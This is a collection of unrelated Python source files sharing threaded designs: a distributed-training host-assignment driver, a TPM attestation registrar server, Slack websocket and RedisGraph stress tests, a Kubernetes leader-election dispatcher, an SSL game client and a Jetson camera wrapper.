self._shutdown.set()
self._wait_hosts_cond.notify_all()
raise
# Transient error, retry until timeout
logging.warning(str(e))
finally:
self._wait_hosts_cond.release()
first_update = False
self._shutdown.wait(DISCOVER_HOSTS_FREQUENCY_SECS)
def _notify_workers_host_changes(self, current_hosts, update_res):
next_host_assignments = {}
if current_hosts.count_available_slots() >= self._min_np:
# Assignments are required to be stable via contract
next_host_assignments, _ = self._get_host_assignments(current_hosts)
if next_host_assignments == self.host_assignments:
# Skip notifying workers when host changes would not result in changes of host assignments
logging.debug('no host assignment changes, skipping notifications')
return
coordinator_slot_info = self.get_coordinator_info()
if not coordinator_slot_info:
logging.debug('no coordinator info, skipping notifications')
return
coordinator_client = self.get_worker_client(coordinator_slot_info)
if not coordinator_client:
logging.debug('no coordinator client, skipping notifications')
return
timestamp = _epoch_time_s()
try:
coordinator_client.notify_hosts_updated(timestamp, update_res)
except:
if self._verbose >= 2:
logging.exception('failed to notify {}[{}] of host updates'
.format(coordinator_slot_info.hostname,
coordinator_slot_info.local_rank))
def _update_host_assignments(self, current_hosts):
# Determine the slots that are already filled so we do not respawn these processes
active_slots = set([(host, slot_info.local_rank)
for host, slots in self._host_assignments.items()
for slot_info in slots])
# Adjust the host assignments to account for added / removed hosts
host_assignments, host_assignments_list = self._get_host_assignments(current_hosts)
if len(self._host_assignments) > 0:
# Ensure that at least one previously active host is still assigned, otherwise there is no
# way to sync the state to the new workers
prev_hosts = self._host_assignments.keys()
next_hosts = host_assignments.keys()
if not prev_hosts & next_hosts:
raise RuntimeError('No hosts from previous set remaining, unable to broadcast state.')
self._host_assignments = host_assignments
self._world_size = len(host_assignments_list)
self._rendezvous.init(host_assignments_list)
# Rank assignments map from world rank to slot info
rank_assignments = {}
for slot_info in host_assignments_list:
rank_assignments[slot_info.rank] = slot_info
self._rank_assignments = rank_assignments
# Get the newly assigned slots that need to be started
pending_slots = [slot_info
for host, slots in self._host_assignments.items()
for slot_info in slots
if (host, slot_info.local_rank) not in active_slots]
return pending_slots
def _get_host_assignments(self, current_hosts):
# Adjust the host assignments to account for added / removed hosts
host_list = [hosts.HostInfo(host, current_hosts.get_slots(host))
for host in current_hosts.host_assignment_order]
host_assignments_list = hosts.get_host_assignments(host_list, self._min_np, self._max_np)
host_assignments = defaultdict(list)
for slot_info in host_assignments_list:
host_assignments[slot_info.hostname].append(slot_info)
return host_assignments, host_assignments_list
def _start_worker_processes(self, pending_slots):
for slot_info in pending_slots:
logging.info('start worker process: {}[{}]'.format(slot_info.hostname, slot_info.local_rank))
self._start_worker_process(slot_info)
def _start_worker_process(self, slot_info):
create_worker_fn = self._create_worker_fn
shutdown_event = self._shutdown
host_event = self._host_manager.get_host_event(slot_info.hostname)
def run_worker():
res = create_worker_fn(slot_info, [shutdown_event, host_event])
exit_code, timestamp = res
self._handle_worker_exit(slot_info, exit_code, timestamp)
thread = threading.Thread(target=run_worker)
thread.daemon = True
thread.start()
self._results.expect(thread)
def _handle_worker_exit(self, slot_info, exit_code, timestamp):
if not self.has_rank_assignment(slot_info.hostname, slot_info.local_rank):
# Ignore hosts that are not assigned a rank
logging.debug('host {} has been blacklisted, ignoring exit from local_rank={}'
.format(slot_info.hostname, slot_info.local_rank))
return
if exit_code == 0:
rendezvous_id = self._worker_registry.record_success(slot_info.hostname, slot_info.local_rank)
else:
rendezvous_id = self._worker_registry.record_failure(slot_info.hostname, slot_info.local_rank)
if self.finished() and self._worker_registry.last_rendezvous() == rendezvous_id:
logging.debug('adding results for {}[{}]: ({}, {})'
.format(slot_info.hostname, slot_info.local_rank, exit_code, timestamp))
name = '{}[{}]'.format(slot_info.hostname, slot_info.local_rank)
self._results.add_result(name, (exit_code, timestamp))
|
BotoChatLayer.py
|
import logging
import threading
from yowsup.layers import YowLayer
class BotoChatLayer(YowLayer):
def __init__(self):
super().__init__()
self.logger = logging.getLogger("botosan.logger")
def send(self, data):
threading.Thread(target=self.child).start()
self.toLower(data)
def receive(self, data):
self.toUpper(data)
def child(self):
pass
|
registrar_common.py
|
'''
DISTRIBUTION STATEMENT A. Approved for public release: distribution unlimited.
This material is based upon work supported by the Assistant Secretary of Defense for
Research and Engineering under Air Force Contract No. FA8721-05-C-0002 and/or
FA8702-15-D-0001. Any opinions, findings, conclusions or recommendations expressed in this
material are those of the author(s) and do not necessarily reflect the views of the
Assistant Secretary of Defense for Research and Engineering.
Copyright 2015 Massachusetts Institute of Technology.
The software/firmware is provided to you on an As-Is basis
Delivered to the US Government with Unlimited Rights, as defined in DFARS Part
252.227-7013 or 7014 (Feb 2014). Notwithstanding any copyright notice, U.S. Government
rights in this work are defined by DFARS 252.227-7013 or DFARS 252.227-7014 as detailed
above. Use of this work other than as specifically authorized by the U.S. Government may
violate any copyrights that exist in this work.
'''
import threading
import sys
import base64
import configparser
import signal
import time
import hashlib
import http.server
try:
import simplejson as json
except ImportError:
raise("Simplejson is mandatory, please install")
from http.server import HTTPServer, BaseHTTPRequestHandler
from socketserver import ThreadingMixIn
from urllib.parse import urlparse
from keylime import registrar_client
from keylime import crypto
from keylime import cloud_verifier_common
from keylime import keylime_sqlite
from keylime import tpm_obj
from keylime import common
from keylime import keylime_logging
logger = keylime_logging.init_logging('registrar-common')
# setup config
config = configparser.ConfigParser()
config.read(common.CONFIG_FILE)
class ProtectedHandler(BaseHTTPRequestHandler):
def do_HEAD(self):
"""HEAD not supported"""
common.echo_json_response(self, 405, "HEAD not supported")
return
def do_PATCH(self):
"""PATCH not supported"""
common.echo_json_response(self, 405, "PATCH not supported")
return
def do_GET(self):
"""This method handles the GET requests to retrieve status on agents from the Registrar Server.
Currently, only agents resources are available for GETing, i.e. /agents. All other GET uri's
will return errors. agents requests require a single agent_id parameter which identifies the
agent to be returned. If the agent_id is not found, a 404 response is returned.
"""
rest_params = common.get_restful_params(self.path)
if rest_params is None:
common.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface")
return
if "agents" not in rest_params:
common.echo_json_response(self, 400, "uri not supported")
logger.warning('GET returning 400 response. uri not supported: ' + self.path)
return
agent_id = rest_params["agents"]
if agent_id is not None:
agent = self.server.db.get_agent(agent_id)
if agent is None:
common.echo_json_response(self, 404, "agent_id not found")
logger.warning('GET returning 404 response. agent_id ' + agent_id + ' not found.')
return
if not agent['active']:
common.echo_json_response(self, 404, "agent_id not yet active")
logger.warning('GET returning 404 response. agent_id ' + agent_id + ' not yet active.')
return
response = {
'aik': agent['aik'],
'ek': agent['ek'],
'ekcert': agent['ekcert'],
'regcount': agent['regcount'],
}
if agent['virtual']:
response['provider_keys']= agent['provider_keys']
common.echo_json_response(self, 200, "Success", response)
logger.info('GET returning 200 response for agent_id:' + agent_id)
else:
# return the available registered uuids from the DB
json_response = self.server.db.get_agent_ids()
common.echo_json_response(self, 200, "Success", {'uuids':json_response})
logger.info('GET returning 200 response for agent_id list')
return
def do_POST(self):
"""POST not supported"""
common.echo_json_response(self, 405, "POST not supported via TLS interface")
return
def do_PUT(self):
"""PUT not supported"""
common.echo_json_response(self, 405, "PUT not supported via TLS interface")
return
def do_DELETE(self):
"""This method handles the DELETE requests to remove agents from the Registrar Server.
Currently, only agents resources are available for DELETEing, i.e. /agents. All other DELETE uri's will return errors.
agents requests require a single agent_id parameter which identifies the agent to be deleted.
"""
rest_params = common.get_restful_params(self.path)
if rest_params is None:
common.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface")
return
if "agents" not in rest_params:
common.echo_json_response(self, 400, "uri not supported")
logger.warning('DELETE agent returning 400 response. uri not supported: ' + self.path)
return
agent_id = rest_params["agents"]
if agent_id is not None:
if self.server.db.remove_agent(agent_id):
#send response
common.echo_json_response(self, 200, "Success")
return
else:
#send response
common.echo_json_response(self, 404)
return
else:
common.echo_json_response(self, 404)
return
def log_message(self, logformat, *args):
return
class UnprotectedHandler(BaseHTTPRequestHandler):
def do_HEAD(self):
"""HEAD not supported"""
common.echo_json_response(self, 405, "HEAD not supported")
return
def do_PATCH(self):
"""PATCH not supported"""
common.echo_json_response(self, 405, "PATCH not supported")
return
def do_GET(self):
"""GET not supported"""
common.echo_json_response(self, 405, "GET not supported")
return
def do_POST(self):
"""This method handles the POST requests to add agents to the Registrar Server.
Currently, only agents resources are available for POSTing, i.e. /agents. All other POST uri's
will return errors. POST requests require an agent_id identifying the agent to add, and a json
block sent in the body with 2 entries: ek and aik.
"""
rest_params = common.get_restful_params(self.path)
if rest_params is None:
common.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface")
return
if "agents" not in rest_params:
common.echo_json_response(self, 400, "uri not supported")
logger.warning('POST agent returning 400 response. uri not supported: ' + self.path)
return
agent_id = rest_params["agents"]
if agent_id is None:
common.echo_json_response(self, 400, "agent id not found in uri")
logger.warning('POST agent returning 400 response. agent id not found in uri ' + self.path)
return
try:
content_length = int(self.headers.get('Content-Length', 0))
if content_length == 0:
common.echo_json_response(self, 400, "Expected non zero content length")
logger.warning('POST for ' + agent_id + ' returning 400 response. Expected non zero content length.')
return
post_body = self.rfile.read(content_length)
json_body = json.loads(post_body)
ek = json_body['ek']
ek_tpm = json_body['ek_tpm']
ekcert = json_body['ekcert']
aik = json_body['aik']
aik_name = json_body['aik_name']
tpm_version = int(json_body['tpm_version'])
# try to encrypt the AIK
tpm = tpm_obj.getTPM(need_hw_tpm=False,tpm_version=tpm_version)
(blob,key) = tpm.encryptAIK(agent_id,aik,ek,ek_tpm,aik_name)
# special behavior if we've registered this uuid before
regcount = 1
agent = self.server.db.get_agent(agent_id)
if agent is not None:
# keep track of how many ek-ekcerts have registered on this uuid
regcount = agent['regcount']
if agent['ek'] != ek or agent['ekcert'] != ekcert:
logger.warning('WARNING: Overwriting previous registration for this UUID with new ek-ekcert pair!')
regcount += 1
# force overwrite
logger.info('Overwriting previous registration for this UUID.')
# self.server.db.remove_agent(agent_id)
self.server.db.remove_agent(agent_id)
# Add values to database
d={}
d['ek']=ek
d['aik']=aik
d['ekcert']=ekcert
d['virtual']=int(ekcert=='virtual')
d['active']=int(False)
d['key']=key
d['tpm_version']=tpm_version
d['provider_keys']={}
d['regcount']=regcount
self.server.db.add_agent(agent_id, d)
response = {
'blob': blob,
}
common.echo_json_response(self, 200, "Success", response)
logger.info('POST returning key blob for agent_id: ' + agent_id)
return
except Exception as e:
common.echo_json_response(self, 400, "Error: %s"%e)
logger.warning("POST for " + agent_id + " returning 400 response. Error: %s"%e)
logger.exception(e)
return
def do_PUT(self):
"""This method handles the PUT requests to add agents to the Registrar Server.
Currently, only agents resources are available for PUTing, i.e. /agents. All other PUT uri's
will return errors.
"""
rest_params = common.get_restful_params(self.path)
if rest_params is None:
common.echo_json_response(self, 405, "Not Implemented: Use /agents/ interface")
return
if "agents" not in rest_params:
common.echo_json_response(self, 400, "uri not supported")
logger.warning('PUT agent returning 400 response. uri not supported: ' + self.path)
return
agent_id = rest_params["agents"]
if agent_id is None:
common.echo_json_response(self, 400, "agent id not found in uri")
logger.warning('PUT agent returning 400 response. agent id not found in uri ' + self.path)
return
try:
content_length = int(self.headers.get('Content-Length', 0))
if content_length == 0:
common.echo_json_response(self, 400, "Expected non zero content length")
logger.warning('PUT for ' + agent_id + ' returning 400 response. Expected non zero content length.')
return
post_body = self.rfile.read(content_length)
json_body = json.loads(post_body)
if "activate" in rest_params:
auth_tag=json_body['auth_tag']
agent = self.server.db.get_agent(agent_id)
if agent is None:
raise Exception("attempting to activate agent before requesting registrar for %s"%agent_id)
if agent['virtual']:
raise Exception("attempting to activate virtual AIK using physical interface for %s"%agent_id)
if common.STUB_TPM:
self.server.db.update_agent(agent_id, 'active',True)
else:
ex_mac = crypto.do_hmac(agent['key'],agent_id)
if ex_mac == auth_tag:
self.server.db.update_agent(agent_id, 'active',True)
else:
raise Exception("Auth tag %s does not match expected value %s"%(auth_tag,ex_mac))
common.echo_json_response(self, 200, "Success")
logger.info('PUT activated: ' + agent_id)
elif "vactivate" in rest_params:
deepquote = json_body.get('deepquote',None)
agent = self.server.db.get_agent(agent_id)
if agent is None:
raise Exception("attempting to activate agent before requesting registrar for %s"%agent_id)
if not agent['virtual']:
raise Exception("attempting to activate physical AIK using virtual interface for %s"%agent_id)
# get a physical AIK for this host
registrar_client.init_client_tls(config, 'registrar')
provider_keys = registrar_client.getKeys(config.get('registrar', 'provider_registrar_ip'), config.get('registrar', 'provider_registrar_tls_port'), agent_id)
# we already have the vaik
tpm = tpm_obj.getTPM(need_hw_tpm=False,tpm_version=agent['tpm_version'])
if not tpm.check_deep_quote(agent_id,
hashlib.sha1(agent['key']).hexdigest(),
agent_id+agent['aik']+agent['ek'],
deepquote,
agent['aik'],
provider_keys['aik']):
raise Exception("Deep quote invalid")
self.server.db.update_agent(agent_id, 'active',True)
self.server.db.update_agent(agent_id, 'provider_keys',provider_keys)
common.echo_json_response(self, 200, "Success")
logger.info('PUT activated: ' + agent_id)
else:
pass
except Exception as e:
common.echo_json_response(self, 400, "Error: %s"%e)
logger.warning("PUT for " + agent_id + " returning 400 response. Error: %s"%e)
logger.exception(e)
return
def do_DELETE(self):
"""DELETE not supported"""
common.echo_json_response(self, 405, "DELETE not supported")
return
def log_message(self, logformat, *args):
return
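# Illustrative sketch (not part of this module): the body POSTed to
# /agents/<agent_id> on the unprotected interface is a JSON object carrying the
# fields read in do_POST above. The values here are placeholders, not real key
# material.
_example_registration_body = {
    'ek': '<EK public key>',
    'ek_tpm': '<TPM-encoded EK>',
    'ekcert': '<EK certificate, or "virtual">',
    'aik': '<AIK public key>',
    'aik_name': '<AIK name>',
    'tpm_version': 2,
}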
#consider using PooledProcessMixIn
# https://github.com/muayyad-alsadi/python-PooledProcessMixIn
class ProtectedRegistrarServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
db = None
def __init__(self, server_address, db,RequestHandlerClass):
"""Constructor overridden to provide ability to read file"""
self.db = db
http.server.HTTPServer.__init__(self, server_address, RequestHandlerClass)
def shutdown(self):
http.server.HTTPServer.shutdown(self)
class UnprotectedRegistrarServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
db = None
def __init__(self, server_address,db,RequestHandlerClass):
"""Constructor overridden to provide ability to read file"""
self.db = db
http.server.HTTPServer.__init__(self, server_address, RequestHandlerClass)
def shutdown(self):
http.server.HTTPServer.shutdown(self)
def init_db(dbname):
# in the form key, SQL type
cols_db = {
'agent_id': 'TEXT PRIMARY_KEY',
'key': 'TEXT',
'aik': 'TEXT',
'ek': 'TEXT',
'ekcert': 'TEXT',
'virtual': 'INT',
'active': 'INT',
'provider_keys': 'TEXT',
'regcount': 'INT',
}
# these are the columns that contain json data and need marshalling
json_cols_db = ['provider_keys']
# in the form key : default value
exclude_db = {}
return keylime_sqlite.KeylimeDB(dbname,cols_db,json_cols_db,exclude_db)
def do_shutdown(servers):
for server in servers:
server.shutdown()
def start(tlsport,port,dbfile):
"""Main method of the Registrar Server. This method is encapsulated in a function for packaging to allow it to be
called as a function by an external program."""
threads = []
servers = []
serveraddr = ('', tlsport)
db = init_db("%s/%s"%(common.WORK_DIR,dbfile))
count = db.count_agents()
if count>0:
logger.info("Loaded %d public keys from database"%count)
server = ProtectedRegistrarServer(serveraddr, db, ProtectedHandler)
context = cloud_verifier_common.init_mtls(section='registrar',
generatedir='reg_ca')
if context is not None:
server.socket = context.wrap_socket(server.socket, server_side=True)
thread = threading.Thread(target=server.serve_forever)
threads.append(thread)
# start up the unprotected registrar server
serveraddr2 = ('',port)
server2 = UnprotectedRegistrarServer(serveraddr2,db,UnprotectedHandler)
thread2 = threading.Thread(target=server2.serve_forever)
threads.append(thread2)
servers.append(server)
servers.append(server2)
logger.info('Starting Cloud Registrar Server on ports %s and %s (TLS) use <Ctrl-C> to stop'%(port,tlsport))
for thread in threads:
thread.start()
def signal_handler(signal, frame):
do_shutdown(servers)
sys.exit(0)
# Catch these signals. Note that a SIGKILL cannot be caught, so
# killing this process with "kill -9" may result in improper shutdown
signal.signal(signal.SIGTERM, signal_handler)
signal.signal(signal.SIGQUIT, signal_handler)
signal.signal(signal.SIGINT, signal_handler)
# keep the main thread active, so it can process the signals and gracefully shutdown
while True:
if not any(thread.is_alive() for thread in threads):
# All threads have stopped
break
else:
# Some threads are still going
time.sleep(1)
for thread in threads:
thread.join()
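# Illustrative sketch (hypothetical ports and filename, not part of this module):
# start() serves both interfaces and blocks until a termination signal arrives.
def _example_start_registrar():
    start(tlsport=8891, port=8890, dbfile='registrar_example.sqlite')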
|
test_interactions_websocket_client.py
|
import logging
import time
import unittest
from random import randint
from threading import Thread
from websocket import WebSocketException
from slack_sdk.socket_mode.client import BaseSocketModeClient
from slack_sdk.socket_mode.request import SocketModeRequest
from slack_sdk import WebClient
from slack_sdk.socket_mode.websocket_client import SocketModeClient
from tests.helpers import is_ci_unstable_test_skip_enabled
from tests.slack_sdk.socket_mode.mock_socket_mode_server import (
start_socket_mode_server,
socket_mode_envelopes,
socket_mode_hello_message,
)
from tests.slack_sdk.socket_mode.mock_web_api_server import (
setup_mock_web_api_server,
cleanup_mock_web_api_server,
)
class TestInteractionsWebSocketClient(unittest.TestCase):
logger = logging.getLogger(__name__)
def setUp(self):
setup_mock_web_api_server(self)
self.web_client = WebClient(
token="xoxb-api_test",
base_url="http://localhost:8888",
)
def tearDown(self):
cleanup_mock_web_api_server(self)
def test_interactions(self):
if is_ci_unstable_test_skip_enabled():
return
t = Thread(target=start_socket_mode_server(self, 3012))
t.daemon = True
t.start()
received_messages = []
received_socket_mode_requests = []
def message_handler(ws_app, message):
self.logger.info(f"Raw Message: {message}")
time.sleep(randint(50, 200) / 1000)
received_messages.append(message)
def socket_mode_request_handler(
client: BaseSocketModeClient, request: SocketModeRequest
):
self.logger.info(f"Socket Mode Request: {request}")
time.sleep(randint(50, 200) / 1000)
received_socket_mode_requests.append(request)
client = SocketModeClient(
app_token="xapp-A111-222-xyz",
web_client=self.web_client,
on_message_listeners=[message_handler],
auto_reconnect_enabled=False,
trace_enabled=True,
)
client.socket_mode_request_listeners.append(socket_mode_request_handler)
try:
time.sleep(1) # wait for the server
client.wss_uri = "ws://0.0.0.0:3012/link"
client.connect()
self.assertTrue(client.is_connected())
time.sleep(1) # wait for the message receiver
for _ in range(10):
client.send_message("foo")
client.send_message("bar")
client.send_message("baz")
self.assertTrue(client.is_connected())
expected = (
socket_mode_envelopes
+ [socket_mode_hello_message]
+ ["foo", "bar", "baz"] * 10
)
expected.sort()
count = 0
while count < 10 and len(received_messages) < len(expected):
time.sleep(0.2)
count += 0.2
received_messages.sort()
self.assertEqual(received_messages, expected)
self.assertEqual(
len(socket_mode_envelopes), len(received_socket_mode_requests)
)
finally:
client.close()
self.server.stop()
self.server.close()
def test_send_message_while_disconnection(self):
if is_ci_unstable_test_skip_enabled():
return
t = Thread(target=start_socket_mode_server(self, 3012))
t.daemon = True
t.start()
time.sleep(2) # wait for the server
try:
self.reset_sever_state()
client = SocketModeClient(
app_token="xapp-A111-222-xyz",
web_client=self.web_client,
auto_reconnect_enabled=False,
trace_enabled=True,
)
client.wss_uri = "ws://0.0.0.0:3012/link"
client.connect()
time.sleep(1) # wait for the connection
client.send_message("foo")
client.disconnect()
time.sleep(1) # wait for the connection
try:
client.send_message("foo")
# TODO: The client may not raise an exception here
# self.fail("WebSocketException is expected here")
except WebSocketException as _:
pass
client.connect()
time.sleep(1) # wait for the connection
client.send_message("foo")
finally:
client.close()
self.server.stop()
self.server.close()
|
test_stress.py
|
import os
import sys
import threading
from RLTest import Env
from redisgraph import Graph
from base import FlowTestsBase
GRAPH_ID = "G" # Graph identifier.
CLIENT_COUNT = 100 # Number of concurrent connections.
graphs = None # One graph object per client.
def query_crud(graph, threadID):
for i in range(10):
create_query = "CREATE (n:node {v:'%s'}), (n)-[:have]->({value:'%s'}), (n)-[:have]->({value:'%s'})" % (threadID, threadID, threadID)
read_query = "MATCH (n0:node {v:'%s'})<-[:have]-(n:node)-[:have]->(n1:node) return n1.v" % threadID
update_query = "MATCH (n:node {v: '%s'}) SET n.x = '%s'" % (threadID, threadID)
delete_query = "MATCH (n:node {v: '%s'})-[:have*]->(n1:node) DELETE n, n1" % threadID
graph.query(create_query)
graph.query(read_query)
graph.query(update_query)
graph.query(delete_query)
class testStressFlow(FlowTestsBase):
def __init__(self):
self.env = Env()
global graphs
graphs = []
for i in range(0, CLIENT_COUNT):
redis_con = self.env.getConnection()
graphs.append(Graph(GRAPH_ID, redis_con))
# Run concurrent CRUD queries from all clients.
def test00_stress(self):
threads = []
for i in range(CLIENT_COUNT):
graph = graphs[i]
t = threading.Thread(target=query_crud, args=(graph, i))
t.daemon = True
threads.append(t)
t.start()
# Wait for threads to return.
for i in range(CLIENT_COUNT):
t = threads[i]
t.join()
# Make sure we did not crash.
redis_con = graphs[0].redis_con
redis_con.ping()
|
k8.py
|
import logging
import requests
import json
import platform
import time
import threading
import traceback
from .helpers import *
from .args import get_args
def i_am_supervisor(args):
try:
res = requests.get("http://localhost:4040")
except requests.exceptions.ConnectionError:
logger.warning("Could not contact leadership election sidecar, assuming not leader")
return False
if res.ok:
data = json.loads(res.content)
leader_name = data["name"]
my_name = platform.node()
return leader_name == my_name
else:
res.raise_for_status()
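# Illustrative sketch (not part of this module): the leadership-election sidecar on
# port 4040 is expected to answer with a small JSON document naming the current
# leader, which i_am_supervisor compares against this pod's hostname, e.g.
# (hypothetical pod name) {"name": "worker-pod-7f9c"}.
def _example_is_leader(raw_content):
    data = json.loads(raw_content)
    return data["name"] == platform.node()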
def i_am_drone(args):
am_sup = i_am_supervisor(args)
am_drone = not am_sup or args.master_works
return am_drone
# --------------------------------------------------------------------------
# Thread work loops
# --------------------------------------------------------------------------
def do_drone(args):
drone = None
try:
while True:
am_drone = i_am_drone(args)
if am_drone and drone is None:
logger.info("Start drone")
drone = get_drone(args)
elif not am_drone and drone is not None:
logger.info("Stop drone")
drone.close()
drone = None
if drone is not None:
drone.run_epoch()
time.sleep(args.sleep_per_cycle)
# TODO: actual signalling
except KeyboardInterrupt:
if drone is not None:
drone.close()
except Exception as e:
traceback.print_exc()
raise e
def do_supervisor(args):
sup = None
try:
while True:
am_sup = i_am_supervisor(args)
if am_sup and sup is None:
logger.info("Start supervisor")
sup = get_supervisor(args)
elif not am_sup and sup is not None:
logger.info("Stop supervisor")
sup.close()
sup = None
if sup is not None:
sup.run_epoch()
time.sleep(args.sleep_per_cycle)
# TODO: actual signalling
except KeyboardInterrupt:
if sup is not None:
sup.close()
except Exception as e:
traceback.print_exc()
raise e
# --------------------------------------------------------------------------
# Dispatch threads from main loop
# --------------------------------------------------------------------------
def run_main_dispatch(args):
my_sup = None
my_drones = { k:None for k in range(args.n_drones) }
try:
while True:
if my_sup is None or not my_sup.is_alive():
logger.debug("Dispatch supervisor thread")
my_sup = threading.Thread(target=do_supervisor, args=(args,))
my_sup.daemon = True
my_sup.start()
for key, drone in my_drones.items():
if drone is None or not drone.is_alive():
logger.debug("Dispatch drone thread")
t = threading.Thread(target=do_drone, args=(args,))
t.daemon = True
t.start()
my_drones[key] = t
time.sleep(args.sleep_per_cycle)
except KeyboardInterrupt:
# do something to signal to threads
pass
if __name__ == "__main__":
args = get_args()
install_logging(args)
run_main_dispatch(args)
|
client.py
|
import socket
import ssl
import time
import threading
import json
from src.server.server_utilities import prepare_message
from src.server.server_strings import *
from src.server import server_data
SERVER_IP = "127.0.0.1"
SERVER_PORT = 9999
PLAYER_NAME = input("Enter a display name: ")
while len(PLAYER_NAME) == 0:
PLAYER_NAME = input("Enter a display name: ")
SERVER_NAME = 'N/A'
HEADER_SIZE = 8
CLIENT_TICK_RATE = 0.1
print("Client Initializing...")
context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)
print(f"Connecting to server: [{SERVER_IP}:{SERVER_PORT}]")
insecure_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ssl_socket = context.wrap_socket(insecure_socket, server_hostname=SERVER_IP)
ssl_socket.connect((SERVER_IP, SERVER_PORT))
print(f"Server Certificate:\n{ssl.DER_cert_to_PEM_cert(ssl_socket.getpeercert(True))}")
print(f"Connnection Established: [{SERVER_IP}:{SERVER_PORT}]")
print("------------------------------------------------------------------")
print("This client currently implements a command-system for testing purposes")
print("This will be overridden when the C# client is made.")
print("------------------------------------------------------------------")
print("You can type commands into the console to send them to the server.")
print("\nAvailable commands: ")
print("!say <message>: Broadcasts a chat message to all clients on the server.")
print("!draw: Draws a card from the deck to the player hand.")
print("!play <card_index>: Plays a card from the player hand by the given index.")
print("!cards: Lists the cards currently on hand.")
print("!clients: Lists all the clients on the server.")
print("!start: Starts a game session, currently it only creates a deck and distributes 7 cards to each client.")
print("!stop: Stops an active game session and clears the hands of all clients.")
print("------------------------------------------------------------------")
def disconnect_from_server(reason=None):
global kill_threads
kill_threads = True
if ssl_socket:
ssl_socket.close()
print(f"Client disconnected from server: [{SERVER_IP}:{SERVER_PORT}]")
if reason:
print(f'Client disconnected due to the following: {reason}')
def inbound_server_data():
# Loop incoming messages
while not kill_threads:
try:
# Get header from 10 bytes (2 are formatting)
raw_header = ssl_socket.recv(HEADER_SIZE + 2)
except socket.error as e:
# print(e)
disconnect_from_server()
continue
if len(raw_header) <= 0:
continue
# Get message length from given header info
msg_len = int(raw_header[1:HEADER_SIZE + 1].decode("utf-8"))
# Get the message based on the number of bytes stated in the header
raw_msg = ssl_socket.recv(msg_len)
header = raw_header.decode('utf-8')
message = json.loads(raw_msg.decode('utf-8'))
if message[SERV_DATA_CONTENT] == "!quit":
disconnect_from_server()
elif message[SERV_DATA_CONTENT].split(' ', 1)[0] == "!setname":
global PLAYER_NAME
PLAYER_NAME = message[SERV_DATA_CONTENT].split(' ', 1)[1]
print(f'[DEBUG] Player name set: {PLAYER_NAME}')
elif message[SERV_DATA_CONTENT].split(' ', 1)[0] == "!setserver":
global SERVER_NAME
SERVER_NAME = message[SERV_DATA_CLIENT]
print(f'[DEBUG] Server name set: {SERVER_NAME}')
else:
print(f"{header}[{message[SERV_DATA_CLIENT] if message[SERV_DATA_CLIENT] is not None else SERVER_NAME}{' -> Me' if message[SERV_DATA_TYPE] != SERV_BROADCAST else ''}]:{message[SERV_DATA_CONTENT]}")
def outbound_data_to_server():
# Send connect message
connect_data = server_data.Data(content_type=SERV_MESSAGE, content_data=f"!connect {PLAYER_NAME}", client=PLAYER_NAME)
ssl_socket.send(bytes(prepare_message(connect_data), 'utf-8'))
while not kill_threads:
try:
# Send data to the server.
data_to_send = input()
if len(data_to_send) != 0:
data_to_send = server_data.Data(content_type=SERV_MESSAGE, content_data=data_to_send, client=PLAYER_NAME)
ssl_socket.send(bytes(prepare_message(data_to_send), 'utf-8'))
except socket.error as e:
# print(e)
disconnect_from_server()
return
time.sleep(CLIENT_TICK_RATE)
# Kill flags
kill_threads = False
# Start inbound data retrieval.
inbound_thread = threading.Thread(target=inbound_server_data)
inbound_thread.start()
# Start outbound data sending.
outbound_thread = threading.Thread(target=outbound_data_to_server)
outbound_thread.start()
|
camera.py
|
import traitlets
from traitlets.config.configurable import SingletonConfigurable
import atexit
import cv2
from cv2 import VideoCapture, CAP_GSTREAMER
import threading
import numpy as np
from sloth.undistort import FisheyeUndistorter, PerspectiveUndistorter, get_fisheye
class Camera(SingletonConfigurable):
value = traitlets.Any()
# config
width = traitlets.Integer(default_value=224).tag(config=True)
height = traitlets.Integer(default_value=224).tag(config=True)
fps = traitlets.Integer(default_value=21).tag(config=True)
capture_width = traitlets.Integer(default_value=3280).tag(config=True)
capture_height = traitlets.Integer(default_value=2464).tag(config=True)
argusmode = traitlets.Integer(default_value=-1).tag(config=True)
flipmode = traitlets.Integer(default_value=0).tag(config=True)
autostart = traitlets.Bool(default_value=True).tag(config=True)
extraconfig = traitlets.Unicode(default_value="").tag(config=True)
def __init__(self, *args, **kwargs):
self.value = np.empty((self.height, self.width, 3), dtype=np.uint8)
super(Camera, self).__init__(*args, **kwargs)
self.undistort = False
self.undistorter = None
self.undistort_dim = None
self.undistort_k = None
self.undistort_d = None
self.undistort_balance = 0
self.undistort_dim2 = None
self.undistort_dim3 = None
self.undistort_map1 = None
self.undistort_map2 = None
self.crop_x1 = None
self.crop_y1 = None
self.crop_x2 = None
self.crop_y2 = None
self.warp = False
if self.argusmode >= 0:
vw, vh, vf = self._get_argus_mode(self.argusmode)
self.capture_width = vw
self.capture_height = vh
self.fps = vf
if self.width == 0 or self.height == 0:
self.width = self.capture_width
self.height = self.capture_height
try:
self.cap = VideoCapture(self._gst_str(), CAP_GSTREAMER)
re, image = self.cap.read()
if not re:
raise RuntimeError('Could not read image from camera.')
self.value = image
if self.autostart:
self.start()
        except Exception:
self.stop()
raise RuntimeError('Could not initialize camera. Please see error trace.')
atexit.register(self.stop)
def _capture_frames(self):
while True:
re, image = self.cap.read()
if re:
self.value = self.post_process_image(image)
else:
break
def _gst_str(self):
return 'nvarguscamerasrc %s ! video/x-raw(memory:NVMM), width=%d, height=%d, format=(string)NV12, framerate=(fraction)%d/1 ! nvvidconv flip-method=%d ! video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! videoconvert ! appsink' % (
self.extraconfig, self.capture_width, self.capture_height, self.fps, self.flipmode, self.width, self.height)
def _get_argus_mode(self, mode):
if mode == 0:
return 3280, 2464, 21
elif mode == 1:
return 3280, 1848, 28
elif mode == 2:
return 1920, 1080, 30
elif mode == 3:
return 1280, 720, 60
elif mode == 4:
return 1280, 720, 120
def start(self):
if not self.cap.isOpened():
self.cap.open(self._gst_str(), CAP_GSTREAMER)
        if not hasattr(self, 'thread') or not self.thread.is_alive():
self.thread = threading.Thread(target=self._capture_frames)
self.thread.start()
def stop(self):
if hasattr(self, 'cap'):
self.cap.release()
if hasattr(self, 'thread'):
self.thread.join()
def restart(self):
self.stop()
self.start()
